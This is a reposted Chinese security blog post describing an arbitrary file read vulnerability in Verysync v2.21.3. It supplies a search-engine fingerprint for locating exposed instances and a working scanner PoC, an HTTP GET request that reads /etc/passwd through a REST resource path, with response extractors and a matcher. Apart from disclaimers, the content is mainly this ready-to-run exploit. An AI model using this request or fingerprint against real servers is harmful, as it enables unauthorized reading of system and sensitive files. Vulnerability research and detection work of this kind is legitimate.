文章总结： 本文档复现了微力同步Verysyncv2.21.3版本存在的任意文件读取漏洞，攻击者可利用特定API接口读取服务器任意文件获取敏感信息。文中提供了空间测绘指纹与VeilPOC验证代码，内容简洁且具备较高的可操作性与实战价值。 综合评分： 75 文章分类： 漏洞POC,漏洞分析,WEB安全,渗透测试

[漏洞复现]微力同步-Verysync任意文件读取漏洞(VEID-2026-11111)

老谢 老谢

H4ll0 H4ck3r

2026年3月26日 21:11 广东

声明: 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，H4ll0 H4ck3r及文章作者不为此承担任何责任。H4ll0 H4ck3r拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经H4ll0 H4ck3r允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

漏洞描述

微力同步-Verysync任意文件读取漏洞攻击者可进行任意文件读取,从而获得敏感信息。

影响版本

微力同步-Verysync | v2.21.3

空间测绘

body="Verysync"

本地漏洞环境复现

Veil POC

GET /rest/f/api/resources/f96956469e7be39d/etc/passwd?override=false HTTP/1.1Host: {{Hostname}}User-Agent: {{random_ua}}
#@ condition: and#> extract: name=path, from=body, json=$.path#> extract: name=content, from=body, json=$.content#@ matcher: status_code == 200

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：H4ll0 H4ck3r 老谢 老谢《[漏洞复现]微力同步-Verysync任意文件读取漏洞(VEID-2026-11111)》